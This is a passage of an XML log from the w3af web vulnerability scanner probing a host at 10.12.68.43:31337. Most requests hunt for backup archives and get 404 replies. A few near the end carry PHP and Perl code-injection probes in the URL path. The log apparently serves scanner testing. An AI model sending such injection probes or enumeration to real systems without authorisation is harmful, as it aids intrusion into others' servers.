                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="235">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="236">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="237">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="551" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="238">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="240">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="546" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="241">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="242">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="243">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="244">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="245">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="246">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="247">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="549" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="248">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="249">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="250">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="251">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/10.12.68.43.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.43.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="253">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/cake HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;Chocolate cake&lt;/h2&gt;

    &lt;ul&gt;
        &lt;li&gt;225g/8oz plain flour&lt;/li&gt;
        &lt;li&gt;350g/12½oz caster sugar&lt;/li&gt;
        &lt;li&gt;85g/3oz cocoa powder&lt;/li&gt;
        &lt;li&gt;1½ tsp baking powder&lt;/li&gt;
        &lt;li&gt;1½ tsp bicarbonate of soda&lt;/li&gt;
        &lt;li&gt;2 free-range eggs&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz milk&lt;/li&gt;
        &lt;li&gt;125ml/4½fl oz vegetable oil&lt;/li&gt;
        &lt;li&gt;2 tsp vanilla extract&lt;/li&gt;
        &lt;li&gt;250ml/9fl oz boiling water&lt;/li&gt;
    &lt;/ul&gt;
    &lt;a href='/cake'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="258">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/echo+str_repeat%28%27tuyzr%27%2C5%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about echo+str_repeat%28%27tuyzr%27%2C5%29%3B has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='echo+str_repeat%28%27tuyzr%27%2C5%29%3B'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="260">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/print+%27tuyzr%27x5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27tuyzr%27x5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27tuyzr%27x5'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="268">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/print+%27tuyzr%27%2A5 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about print+%27tuyzr%27%2A5 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='print+%27tuyzr%27%2A5'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="270">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/6bBCX4LD HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
